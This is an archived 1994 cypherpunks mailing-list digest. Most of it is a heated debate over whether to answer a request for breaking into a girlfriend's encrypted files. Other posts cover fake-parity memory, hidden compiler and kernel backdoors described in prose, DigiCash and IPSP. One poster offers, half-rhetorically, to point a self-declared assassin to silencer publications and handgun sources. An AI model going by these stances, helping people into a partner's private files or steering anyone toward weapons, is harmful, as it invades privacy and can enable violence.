Dec 94 14:10:49 PST Subject: Are 2048-bit pgp keys really secure ? In-Reply-To: <199412282004.MAA04125@jobe.shell.portal.com> Message-ID: <9412290859.ZM12937@wiley.sydney.sgi.com> On Dec 28, 12:04pm, Hal wrote: > Let us suppose that a 8 MB PC uses parity protection per byte and gets > one parity error per year of operation. This is just a guess but I have > occasionally seen parity errors on PC's and I certainly don't use them > full time 24 hours a day for a year! Just a mostly-irrelevant aside... A somewhat disturbing trend has appeared in the low-end cost-sensitive PC SIMM market. Some supposedly 9-bit SIMMs are actually 8-bit SIMMs plus a parity generator. This means that the parity checking is essentially subverted, because the parity bit is generated from the stored contents of memory at read time, rather than the stored contents when it was written to. As such, NO bit errors are detected. These SIMMs are almost all being produced in Taiwan, and many have the parity generator marked so that the chip appears to be another DRAM. It is worth watching out for. Why are they doing this? Well, parity generators are much cheaper than the extra DRAM, and so the manufacturers are saving 15-20% on the production price. Ian. From tedwards at src.umd.edu Wed Dec 28 14:28:09 1994 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Wed, 28 Dec 94 14:28:09 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <9412281640.AA09644@wombat.sware.com> Message-ID: On Wed, 28 Dec 1994, Jeff Barber wrote: > Let's face it, creating the compiler-to-recognize-MD5 is quite a difficult > problem, and if I were your system administrator and wanted to obtain > access to your files, creating a special compiler version or otherwise > attempting to cause your integrity check to fail would be one of the last > forms of attack I'd try. Infact you'd need a totally secure OS to try to achieve this goal. You can have the loader recognize the MD5 or other integrity measures. The loader could even contact an authorization server to see if you have paid the license fee to use the program... -Thomas From unicorn at access.digex.net Wed Dec 28 14:29:27 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 28 Dec 94 14:29:27 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Sat, 24 Dec 1994, Nesta Stubbs wrote: > Date: Sat, 24 Dec 1994 08:43:07 +0000 > From: Nesta Stubbs > To: Cypherpunks > Subject: Re: Breaking into girlfriend's files > > On Sat, 24 Dec 1994, Black Unicorn wrote: > > > You can only go two ways with this, either of which is self defeating. > > > > 1> All potentially damaging information, by virtue of it's potential > > "wrongful use" shall be banned. > > > > 2> All information clearly going to be used for the "wrong purposes" > > shall be restricted. > > > > > > There is simply no other way to restrict information as you propose. > > > How about simply giving the information if you feel like it, and > witholding it if you don't. And don't bother wether other people give it > to him. A simple individual choice wthout attempting to set guidelines > for morality or any of that worthless shit. > You realize of couse this simply applies the individuals morality to the problem. It does not remove a subjective imposition. Of course, I'm not going to argue that there is a duty to disclose requested information, just understand exactly what is taking place here. > > i want to know everything http://www.mcs.com/~nesta/home.html > i want to be everywhere Nesta's Home Page > i want to fuck everyone in the world & > i want to do something that matters /-/ a s t e zine > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Wed Dec 28 14:32:33 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 28 Dec 94 14:32:33 PST Subject: Breaking into girlfriend's files In-Reply-To: <9412242006.AA11428@toad.com> Message-ID: On Sat, 24 Dec 1994, Ken Arromdee wrote: > Date: Sat, 24 Dec 94 15:06:43 EST > From: Ken Arromdee > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > Black Unicorn: > >1> All potentially damaging information, by virtue of it's potential > >"wrongful use" shall be banned. > >2> All information clearly going to be used for the "wrong purposes" > >shall be restricted. > >The result in 1>, I think is quite clear. > >The result in 2>, requires some ONE, some GROUP to decide what is and is > >not A> "clearly going to be used for," B> "the wrong purposes." ... > >You end up with either a cut throat thought police regime, or slightly > >less offensive paternalistic censorship. You choose, what is it you want > >to have? > > Any individual has the right to decide what information to give out. If that > means the individual has to judge someone else's purposes, then so be it. The > individual may even try to persuade others not to give out the information. > > It only becomes a problem if he's trying to use force--to keep others who > _do_ want to reveal the information, from revealing it. This is _the_ > difference between the current situation, and real police state censorship; > censorship prevents someone from speaking who wants to speak; it doesn't > merely mean that the government itself won't speak to you. The problem I had was the justification of refusal to disclose in some moral argument. Even more annoying was the poster's attempt to cast that argument as a cypherpunk position (of which there are none). Like I said, I will be the last to argue there is any sort of duty to disclose, and the first to flame if someone justifies their refusal to disclose on anything other than an individual decision not to. A lecture on morality accompanying a refusal to disclose is just arrogant. > -- > Ken Arromdee (email: arromdee at jyusenkyou.cs.jhu.edu) > > "No boom today. Boom tomorrow, there's always a boom tomorrow." --Ivanova > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From nesta at nesta.pr.mcs.net Wed Dec 28 14:40:04 1994 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Wed, 28 Dec 94 14:40:04 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Wed, 28 Dec 1994, Black Unicorn wrote: > On Sat, 24 Dec 1994, Nesta Stubbs wrote: > > > How about simply giving the information if you feel like it, and > > witholding it if you don't. And don't bother wether other people give it > > to him. A simple individual choice wthout attempting to set guidelines > > for morality or any of that worthless shit. > > > > > You realize of couse this simply applies the individuals morality to the > problem. It does not remove a subjective imposition. > What the hell else is human interaction and transferring of infromation but the non-subjective imposition of a morality(however loose that morality may be). It applies the individuals morality to their interactions with the other person, which is all natural and IMO impossible to stop without encroaching on personal freedom. > Of course, I'm not going to argue that there is a duty to disclose > requested information, just understand exactly what is taking place here. > the same thing that takes place in any form of communication. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From unicorn at access.digex.net Wed Dec 28 14:41:27 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 28 Dec 94 14:41:27 PST Subject: PSWD: "The Girlfriend's Opinion" In-Reply-To: Message-ID: On Sun, 25 Dec 1994, Dave Del Torto wrote: > Date: Sun, 25 Dec 1994 05:26:19 -0800 > From: Dave Del Torto > To: cypherpunks at toad.com > Cc: Ian Farquhar , > Black Unicorn > Subject: PSWD: "The Girlfriend's Opinion" > > At 8:28 pm 12/23/94, Black Unicorn wrote: > >Who the hell are you to define the position of cypherpunks? > >Who the hell are any of us to do this? > > Both interesting questions... and self-cancelling ones. As far as I know, > Cypherpunks define their own personal positions and don't impose theirs on > any one else, as you yourself seem to have done, Uni. Your argument, much > like your "standard" is somewhat suspect in my view. Specifically? (I'm always open to such criticisms) > > Regarding your language: please tone it down a little? Rely less on ad > hominem flames and the word "shit" and more on the strength of your > arguments and I'd be more inclined to respect your opinions. Once I pick > through your invective, you "seem" to have a point, but you really do go on > a bit, making it a lot of work... are you sober as you write these things? I don't drink. I do have a temper. Of course you have a point, I did apologize to the list. > On the topic: let me relay an interesting little tidbit I heard recently on [...] > a physician. An interesting parallel. I agree. > Privacy is Privacy, even if it's your intimate friend's privacy. Just > because someone trusts you, it doesn't give you any rights to their > personal data. I've had supposed "friends" try to break into my personal > files before, so I wouldn't presume to pontificate on who deserves more > privacy: everyone does. The free flow of information on system security is > important, but when it sacrifices someone's privacy. If you intend to post > information on how a system can be compromised, it seems to me that the > responsible thing to do (as a cypherpunk or a physician) is to first notify > the sysadmin or password-owner so as to make sure they've been able to > close their doors, and THEN post the info to others judiciously using only > enough detail as is necessary for educational purposes (like the doctor > above). While I appreciate your attempt to work damage control into the process, I simply cannot agree. The withholding of information, in the cryptographic context, is simply not in any sort of alignment with my position. Speaking of health issues is to bring the matter off point. Crypto is such that it simply cannot advance without specific and DETAILED accounts of flaws and potential attacks. To withhold this information on the grounds that it might be damaging is silly, and moreover, potentially catching and slippery slope like. To withhold it on moral grounds, then to insist that it is in accordance with freedom of information and privacy concerns is to see no farther than the rims of one's glasses. > Uni, you don't work at a nuclear site, do you? ;) Nope. > > dave > ___________________________________________________________________________ > "Rudeness is the penultimate refuge of the Incompetent; violence, the last" > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Wed Dec 28 14:56:40 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 28 Dec 94 14:56:40 PST Subject: Breaking into girlfriend's files In-Reply-To: <9412271452.AA23162@yeti.bsnet> Message-ID: On Tue, 27 Dec 1994 dmandl at bear.com wrote: > Date: Tue, 27 Dec 94 09:52:22 EST > From: dmandl at bear.com > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > Black Unicorn writes: > > > I guess I suffered from the silly idea that as a whole, the members of > > the list would not put short term morality before the long term goal. > > Do me a favor, Uni: I want to assassinate you and all the other members > of your family. Could you send me some powerful handguns and silencers? > Oh, and while you're at it, give me all of your addresses and precise > travel schedules for the next two weeks. As an "amoralist," I'm sure you > won't put short term morality before my long-term goal. Thanks. I fear what you request would probably violate many laws. Providing you with weaponry has little to do with providing you the information you might need to obtain and modify such weapons as you will need. I will however be happy to direct you to several publications on the manufacture and use of silencers, disposable and otherwise. I will also, as an academic gesutre, be happy to provide you with likely sources or methods to obtain or otherwise control handguns and other such weaponry. As for my addresses, I'm sure if you're serious about killing me and my family, you'll be able to obtain these. Arguing that they are in the public domain, unless I have put them there, is just silly, off point and misunderstands the differences between the basic need of publication and distribution of potential weaknesses and attacks for the advancement of crypto as a technology, and the privacy associated with the personal affairs of others. I will advise you that I take significant personal security measures. Feel free to test these if you like. > > > It seems there are those who disagree with me. I would offer the > > following: While it may be that Joe Break-Into-Girlfriend's-Files may or > > may not be justified, that is not ours to judge. > > I'll judge what I want to, OK? As long as I don't have to listen to it on a crypto mailing list, fine. > What are you trying to do, _coerce_ me > into giving information to someone that I don't want to? As I have stated, I will never argue a duty to disclose, only that a moral argument cast as a cypherpunks position is outrageous. > > It is simply for the > > crypto non-challenged to comment on the security or lack thereof of a > > given system. > > Hmm, sounds like you're telling us what to do. And defining what "we" are, > to boot. I'm many things besides "crypto non-challenged." I'm an individual > and an individualist, not a cog with a particular static role in society, > which is apparently the way you'd like it. If you ask me what the color of > the sky is, I can say "39" if I want. Forgive me for not adding "Or say nothing at all" to the end of my comment, I thought the readership of the list astute enough to pick up on this themselves. It seems I was mistaken. > > As soon as this list turns into a pile of bleeding heart > > liberals, anxious to embroil themselves in the personal matters of > > others, it has failed. > > Yeah, well it seems you were just as quick as the "bleeding heart liberals" > to scold others and impose your personal (a-)morality. Typical. I argued that morality should have never entered in to the conversation. If you want to be meta-physical, I suppose this is a "moral" position. I'll discuss this in e-mail if you wish. > > I cannot believe that people on this list, those who claim to be > > interested in the preservation of privacy, would support the proposition > > that knowledge about the strength or weakness of a given system should be > > surpressed. > > No one was suppressing anything or in any way attempting to stop the flow > of information. They were just expressing their opinions. Just because > _you_ were unhappy with those opinions, that's no reason to hurl accusations > of censorship around. Person A requests information. Person B says no, because the use of the information is unsound in person B's view. Censorship? You tell me. > I can refuse to give help to anyone I don't feel like helping, and if I feel > like giving him a piece of my mind in the process, that's my business and his. It seems everyone is convinced that I was insisting on some sort of duty to disclose. I was not, I will not. > > I submit that the response should have been the same regardless of the > > nature of the material. > > > > Which is it going to be? > > 1> > > Q: "How do you attack X?" > > A: "Y" > > or > > 2> > > Q: "How do you attack X?" > > A: "Realistically X should not be attacked, because to allow the > > widespead lack of confidence in X will destroy society as we know it, and > > anyhow it's nasty." > > Great, I've always wanted to be a simple input-output machine. What you do in your own home is fine. When it comes to information about the strengths and weaknesses of crypto, a moral judgement is not required. > > Pseudo-individualist Republican rubbish... Personal opinion which you insisted I refrain from expressing. I believe the word you used was "Typical" > --Dave. > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Wed Dec 28 15:06:32 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 28 Dec 94 15:06:32 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Tue, 27 Dec 1994, Robert Hettinga wrote: > Date: Tue, 27 Dec 1994 18:43:38 -0500 > From: Robert Hettinga > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > > Psst! Is Tim here? > What? He's on vacation? > Cool. > back in. Adujsts underwear. Taps microphone...> > > Ahem. > > > := At 9:52 AM 12/27/94, dmandl at bear.com > >> := Black Unicorn [...] > > dmandl> Great, I've always wanted to be a simple input-output machine. > dmandl> > dmandl> Pseudo-individualist Republican rubbish... > > As a pedigreed piece of Pseudo-individualist Republican rubbish (PIRR) > myself, I take exception to that remark. Associating noble PIRR with > pseudonyms named for inappropriately-colored fictional creatures really > gets my, ahem, goat. Hey, your talking about a creature that's been in my family for generations, bub. > It seems to me the proper answer to the original poster of this thread was > to greet it with a deafening silence. First, because the answer is trivial > given the technical level of this list (well, the average technical level, > anyway) and can be obtained elsewhere. Second, because there is such a > diversity of ethics, politics, and moral belief on this list, because the > fundemental nature of the technology we discuss here and its potential > impact on human society is so great, to address the question on its merits > would unleash enough verbal flatulatence (including my own, I'm afraid) to > rival even the best Mel Brooks epic. Exactly. > To employ an appropriately PIRR sports metaphor, the question was a pitch > so *obviously* a slow lob over the plate, such an *easy* target for > flamage, that it should have been very apparent to anybody here that it > wouldn't have been fair at all to the pitcher to even swing at it. *Sound of hammer hitting nail on head* > Short of letting it fall into the mitt with a dull thud, a pointer to the > appropriate HAKK3r d00d list would have been the next best thing. This was > done. Next on the list would be actually answering the question as quickly > as possible. This was done. (Thank you, Perry.) The quierant will probably > not be able to execute the proper solution anyway. He'll probably run out > of steam before executing it, and if he does it anyway, he deserves all the > shit he'll find himself in upon decrypting those files. We were all young > and stupid once. Some of us still are, it appears. Yes. (To all) > > Cheers, > Bob Hettinga > > > P.S. My apologies to M(s)r. 'Corn if I stepped on he/she/it's er, hooves. > I meant to cast no asparagas upon he/she/it's choice of nym-name. His choice of nym-name. My hooves are tough. ^^^ > > ----------------- > Robert Hettinga (rah at shipwright.com) "There is no difference between someone > Shipwright Development Corporation who eats too little and sees Heaven and > 44 Farquhar Street someone who drinks too much and sees > Boston, MA 02331 USA snakes." -- Bertrand Russell > (617) 323-7923 > -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Wed Dec 28 15:12:11 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 28 Dec 94 15:12:11 PST Subject: Breaking into girlfriend's files In-Reply-To: <9412281117.ZM10874@wiley.sydney.sgi.com> Message-ID: On Wed, 28 Dec 1994, Ian Farquhar wrote: > Date: Wed, 28 Dec 1994 11:17:19 -0500 > From: Ian Farquhar > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > On Dec 23, 11:28pm, Black Unicorn wrote: > > > I guess I suffered from the silly idea that as a whole, the members of > > the list would not put short term morality before the long term goal. > > Possibly you did, although I question whether the two are incompatible. A legitimate issue. Perhaps one for e-mail? > > I cannot believe that people on this list, those who claim to be > > interested in the preservation of privacy, would support the proposition > > that knowledge about the strength or weakness of a given system should be > > surpressed. > > I don't recall anyone who did mention censorship. I saw a lot of people > suggesting that helping the original pathetic individual was not a > good idea, and then several howls of outrage accusing these people of > censorship. There is a difference between non-disclosure and censorship, > and its not an arbitrary one either. When based on individual judgement, fine, when based and justified by some individual's concept of what cypherpunks stand for and what they should or should not be disclosing, forget it. > > > Disgusting. Get off this list, you belong on alt.codependency.recovery, > > or alt.bleeding.liberal. > > But isn't that exactly what you're proposing? "Get off the list because > your position disagrees with mine." Sounds like censorship to me, > except that "Black Unicorn" is the one deciding what is acceptable. I am properly chastized, and will again, apologize to both the list and the individual. (Sorry) Looking at those words, I can't imagine what infancy prompted me to type them. (Sigh) I would say black outs, but I really don't drink much. > Ian. > > #include > > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From cjl at welchlink.welch.jhu.edu Wed Dec 28 15:35:34 1994 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Wed, 28 Dec 94 15:35:34 PST Subject: Pointers for www pages, please Message-ID: I'm looking for crypto/security/cypherpunk URL's obviously ftp.csua.berkeley.edu http://www.c2.org What's the proper URL for Vince Cates web-page? Other suggestions to me by E-mail please, My purpose for this is mostly to be able to point people I run into on the WWW towards info on C-punk issues and warez d00D :-) Cypherpunk antonym/homonym of the day awareness not equal a-wareness (a state of not having software . . . .) C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From nsb at radiomail.net Wed Dec 28 15:36:12 1994 From: nsb at radiomail.net (NSB's Portable (via RadioMail)) Date: Wed, 28 Dec 94 15:36:12 PST Subject: properties of FV Message-ID: <199412282334.PAA18333@radiomail.net> Once again, I've been on the road, and this time out of RadioMail range, so I'm a bit behind on my mail again. I hope that my replies aren't too redundant with other things that have already been said on the mailing list(s), but I can't check without delaying my answer even longer, because my poor RadioMail service is now so backlogged that it may take a few days just for it to download everything... At 11:17 AM 12/21/94 -0800, Eric Hughes wrote: >The perceived need for crypto "below the line" comes from the >viewpoint that the system needs to be completely secure because crypto >failures must be prevented at all cost. Rubbish. The subsequent >claim that you couldn't possibly put crypto on the Unix boxes which >are in your control is therefore also bogus. This is interesting; that was not the way I saw it, but I can see your point of view. From my end, I don't believe in "completely secure" as a reasonable goal for ANYthing, so this certainly wasn't what I intended to hold out for. Rather, my perspective is that if you add crypto, you should be getting something for it. It's easy to see how you get privacy benefits above the line, and if you do it right you might be able to get some security benefits too (though I haven't yet convinced myself of this). However, if we're going to be able to make some claims as to what we have added, I'd really like to be clear about them. What you've pointed out, that I hadn't thought of, is that if we put the crypto engine on the "above the line" system, we might get some significant and explainable benefits -- in particular, we gain protection of the user's privacy to the extent that breaking privacy now requires breaking into the above-the-line system, rather than merely snooping on the wire. This is true, and I thank you for pointing it out. I think I was a bit confused by the fact that I've thought of some really nice things that can be done when crypto is added BELOW the line, specifically related to the credit card information that ONLY lives there. What this means, however, is that there are now some useful things that can be done with crypto above the line, and even more that can be done with crypto below the line. If they were equally easy, it would make sense to add crypto below the line, as it would buy us more. However, as I've made very clear previously, it is NOT equally easy -- adding it above the line is much easier. This presents us with a new complication to the already complex tradeoffs involved in deciding where to devote our resources. I'm sure you'll understand if I'm reluctant to reach such an important decision overnight, but you've definitely opened my eyes to an attractive "middle path" in the use of optional cryptography in FV transactions. (On a technical level, the only thing I'd *really* like to wait for is the stabilization of the MIME-PGP work, as we'll need it in order to recognize a PGP-encrypted application/green-commerce MIME entity. As you know, I've been active in the MIME-PGP effort, and one very plausible scenario would be to make the FV server be an early implementation of that specification. However, the MIME-PGP draft that I co-wrote last summer is undergoing radical revision, so I'm reluctant to see that version implemented in our server.) In short, you've got a very good point, and you've probably just hastened the day when we support optional PGP encryption, but we're not ready to make any promises or timetables quite yet. >I really don't believe FV would have to put crypto on EDS equipment. "Have to" is the key phrase here. You're absolutely right, and you've pointed out that there's real value in putting crypto on *our* equipment. The attitude I had previously expressed might have been an example of "the best is the enemy of the good" which is something I try to avoid. On the other hand, there are undeniable advantages to putting crypto on EDS equipment -- it's an interesting tradeoff. >The message that it's "not necessary for commerce" is reactionary to >the assertation that it is necessary. By positioning FV in an >adversarial role with respect to cryptography, you'll have the same >problem no matter when you introduce crypto. I personally think >you'll have a harder time changing your position later, after more >people have been exposed to FV's current position. > >A much better public position is that "you can do commerce with or >without crypto", which asserts independence rather than negation. >These two public positions are _not_ identical; they are similar, but >don't be fooled by some positivist notion of denotation into thinking >that they're the same. This is another very important point. They may mean the same in some formal sense, which is what I believed, but your wording is MUCH more constructive. So let me state, with you, that I believe that you can do commerce with or without crypto, and that on the current Internet there are advantages and disadvantages to each approach. I suspect that we can further agree that privacy is one of the advantages of crypto-commerce, and that rapid deployment is one of the advantages of non-crypto-commerce. We may differ on some subtler aspects of that devil word, "security", but for the most part I think we're now in violent agreement. -- Nathaniel From rishab at dxm.ernet.in Wed Dec 28 15:43:19 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Wed, 28 Dec 94 15:43:19 PST Subject: DigiCash unlicensed for US use Message-ID: Someone: > > > I don't think so. It appears that the initial implementation of > >DigiCash works exactly that way [based on what I've read on their W3 > >server]. Of course, I could tell you more exactly had they replied to > >any of my four separate attempts to try it out .. > > Interesting. I too have made four requests and still not received any > software. Can you say "vapor?" > > dave It says very clearly at the DigiCash web site that the technology is NOT LICENSED FOR USE IN THE USA. I've been using the client quite happily from India; though I know for sure that US sites (eg. HotWired) have e-cash servers, there are obviously difficulties in using it there. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Wed Dec 28 15:43:20 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Wed, 28 Dec 94 15:43:20 PST Subject: Morality masks technical ignorance Message-ID: The moralistic rubbish in response to the Norton Encrypt post is just cover for a surprising technical ignorance about the product among Cypherpunks (myself included). Funny. We'd all have kept shut if the question was "I forgot my NE password. What do I do?" Maybe we should stop discussing anonymous remailers lest they be put to 'amoral' use? I always thought the emphasis on this list was on _technological_ rather than _political_ or _legal_ or _moral_ means to protect privacy and free expression - including the current limitations. The inevitability of technology confounding laws - BlackNet as the 'dark' aspect and "National borders are just speed bumps on the information superhighway" as the 'good' side. That's what makes Cypherpunks different from comp.org.eff.talk and alt.privacy, IMHO. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From die at pig.die.com Wed Dec 28 15:44:52 1994 From: die at pig.die.com (Dave Emery) Date: Wed, 28 Dec 94 15:44:52 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <35603.pfarrell@netcom.com> Message-ID: <9412282344.AA05935@pig.die.com> > Pat Farrell writes: > > But I see it as more germane than Eric. It is not about > arbitrary self perpetuating bugs from source. It is > about serious security holes that are self perpetuatated > by the binaries of the complier. The compiler ignores > its own source and generates security hacked binaries, > even when the source looks like it is corrected. I hate to remind everyone, but it is possible to actually inspect the compiled binary output by hand with a debugger and even trace its execution step by step through the usually small security sensitive sections of code. While Thompson's famous hack was clever indeed, it basically depended on security by obscurity - if someone had looked at the generated machine code they easily could have spotted the hook that inserted the magic password. Granted of course this is a lot of work, but so is modifying a compiler or perhaps several of them to selectively insert security hooks. On the other hand Eric's point about execs is more telling however, if the evil sysadmin controls the kernal it is quite possible for him to arrange to have the kernal recognize when the security program code is running and fudge the state of the security code variables by interupting its execution at a private to the kernal breakpoint and invoking code that patches the state of the data or stack areas and then returns to the user code. Since the user process is effectively running on a virtual machine it would be very difficult to create code that would reliably detect such selective violations in the consistancy of the virtual machine, especially as code to check for such violations has to run on the same virtual machine and can also be diddled with by the kernel. In fact if the kernal one is running security code under is not 100% trustworthy no amount of cleverness at the user level can prevent it from obtaining any private information or modifying any private data it wants. And if the hacker is clever enough this can be made nearly invisible to any application program and can be used to do almost anything desired. And since the kernal (/vmunix or whatever) files are accessible to anyone with root and are not integrity checked on bootup, such a hack could be planted by some j. random hacker who had root momentarily and activated much later (perhaps via an obscure user level control file somewhere that specified the gory details of what to recognize and patch). Dave Emery die at die.com From entropy at IntNet.net Wed Dec 28 16:08:12 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 28 Dec 94 16:08:12 PST Subject: DigiCash unlicensed for US use In-Reply-To: Message-ID: > It says very clearly at the DigiCash web site that the technology is NOT > LICENSED FOR USE IN THE USA. I've been using the client quite happily from > there are obviously difficulties in using it there. Marvelous. Regardless of licensing, if you were to look at the list of shops which accept DigiCash e-$, you'd notice that a fairly large number of them are in the United States. (see http://www.digicash.nl/ecash/shops.html) The document I refer to (http://www.digicash.nl/ecash/trial.html) also states that attendees of a W3 conference in Chicago will receive $50.00 in extra e-$. This would seem to preclude US citizenship being a stumbling block to being in on the testing program. Perhaps I'm just not 3133+ enough. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From die at pig.die.com Wed Dec 28 16:31:47 1994 From: die at pig.die.com (Dave Emery) Date: Wed, 28 Dec 94 16:31:47 PST Subject: Are 2048-bit pgp keys really secure ? In-Reply-To: <9412290859.ZM12937@wiley.sydney.sgi.com> Message-ID: <9412290031.AA06235@pig.die.com> > > A somewhat disturbing trend has appeared in the low-end cost-sensitive PC > SIMM market. Some supposedly 9-bit SIMMs are actually 8-bit SIMMs plus > a parity generator. This means that the parity checking is essentially > subverted, because the parity bit is generated from the stored contents > of memory at read time, rather than the stored contents when it was > written to. As such, NO bit errors are detected. > > These SIMMs are almost all being produced in Taiwan, and many have the > parity generator marked so that the chip appears to be another DRAM. > It is worth watching out for. > > Why are they doing this? Well, parity generators are much cheaper than > the extra DRAM, and so the manufacturers are saving 15-20% on the production > price. > > Ian. > There is, or was a couple of years ago, another reason for this. One of the major SIMM patents is for SIMMs with parity and does not apply to SIMMs without (a matter of how the claims were phrased), so companies that don't want to pay royalties to Wang in the US (the owner of MOST SIMM patents) have used this trick not primarily to cut product cost but to aviod paying royalties (something like 5%). From dwomack at runner.utsa.edu Wed Dec 28 17:04:06 1994 From: dwomack at runner.utsa.edu (Dave) Date: Wed, 28 Dec 94 17:04:06 PST Subject: Phil Zimmerman???? Message-ID: <9412290104.AA11633@runner.utsa.edu> I saw an earlier post discussing problems that Phil Zimmerman was facing. Is there any information about what those might be? Regards, Dave From MWOHLER at ix.netcom.com Wed Dec 28 17:35:13 1994 From: MWOHLER at ix.netcom.com (Marc Wohler) Date: Wed, 28 Dec 94 17:35:13 PST Subject: Phil's plight *our fight* Message-ID: <199412290134.RAA07999@ix2.ix.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Nick (The: prince at alpha.c2.org) aks: "If we don't take care of our own, who will?" I have made a pitifly small contribution to Phil Zee's LDF My first contribution to *any* cause on 20 years. C'mon c'punks this is where the ruber meets the road. Where are the fax distribution lists? Let's do it. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwIQHmeikzgqLB7pAQFQ6gP/axPGNzgNMDmTPL4PeluIdZRYffhTfr4R BVOnUvXi13Eyob6C8Z+pPFDyAAl4IPDhoseU68dLpyL2jQ8vd7xTJU2FeLJYKhQV qgl7pWb1R/SB35kclRqMUmS0kMM/xRsmR7loLfhSTs9j2cG/1hO7DG3HkrHszfmQ N6rXVZIt8cU= =3wWQ -----END PGP SIGNATURE----- -- ***Preserve, Protect and Defend the private use of Strong Crypto*** * * * PGP for the masses * * * Finger mjwohler at netcom.com for Marc Wohler's public key fingerprint= F1 70 23 13 91 B5 10 63 0F CF 33 AD BE E6 7B B6 From arromdee at blaze.cs.jhu.edu Wed Dec 28 21:31:14 1994 From: arromdee at blaze.cs.jhu.edu (Ken Arromdee) Date: Wed, 28 Dec 94 21:31:14 PST Subject: Breaking into girlfriend's files Message-ID: <9412290531.AA12756@toad.com> Black Unicorn: >Person A requests information. >Person B says no, because the use of the information is unsound in person >B's view. >Censorship? You tell me. Not unless person B is trying to force other people not to give out the information. Failure to release the information himself is not censorship; it doesn't matter what his reasons for doing so are. -- Ken Arromdee (email: arromdee at jyusenkyou.cs.jhu.edu) "No boom today. Boom tomorrow, there's always a boom tomorrow." --Ivanova From karn at unix.ka9q.ampr.org Wed Dec 28 22:19:49 1994 From: karn at unix.ka9q.ampr.org (Phil Karn) Date: Wed, 28 Dec 94 22:19:49 PST Subject: IPSP and Netscape Message-ID: <199412290621.WAA07850@unix.ka9q.ampr.org> In article <94Dec13.08.6313 at qualcomm.com>, you write: |> Privacy and authentication are also provided by IPSP. However, IPSP |> provides all sorts of advantages -- immunity from traffic analysis, no |> requirement to change the way an application operates to start using |> it, protection of the entire IP stack (not just TCP sockets), very |> minimal changes required to applications that want to use the |> information provided by the IPSP layer for authentication (and no need |> to change your read or write calls or anything), etc, etc, etc. Uh, I don't see that IPSP provides any automatic immunity to traffic analysis. It does make certain kinds of fine-grained traffic analysis a little more difficult. E.g., you can't tell what upper level protocols are in use, and if you share a single SAID between each host pair you can't tell which or how many users are sharing the path. But you can still tell that the hosts are communicating. If you use IPSP in the IS-IS tunnel mode, you could help protect the identities of the end systems on each end, but again you can't hide the fact that the ISes are talking. Something like IPSP *could* serve as the basis of an anonymous forwarding IP network analogous to the existing anonymous remailers, but this would take a lot more work. And you could generate bogus filler traffic between a pair of IPSP hosts to help cover the real traffic between them. Phil From blancw at pylon.com Wed Dec 28 23:46:27 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Wed, 28 Dec 94 23:46:27 PST Subject: Breaking into girlfriend's files (Uni Doesn't Get It) Message-ID: <199412290747.XAA10144@deepthought.pylon.com> >> From: Dave Mandl: Could you send me some powerful handguns and silencers? Oh, and while you're at it, give me all of your addresses and precise travel schedules for the next two weeks. As an "amoralist," I'm sure you won't put short term morality before my long-term goal. Thanks. >From Uni: I fear what you request would probably violate many laws. Providing you with weaponry has little to do with providing you the information you might need to obtain and modify such weapons as you will need. ......................................................... 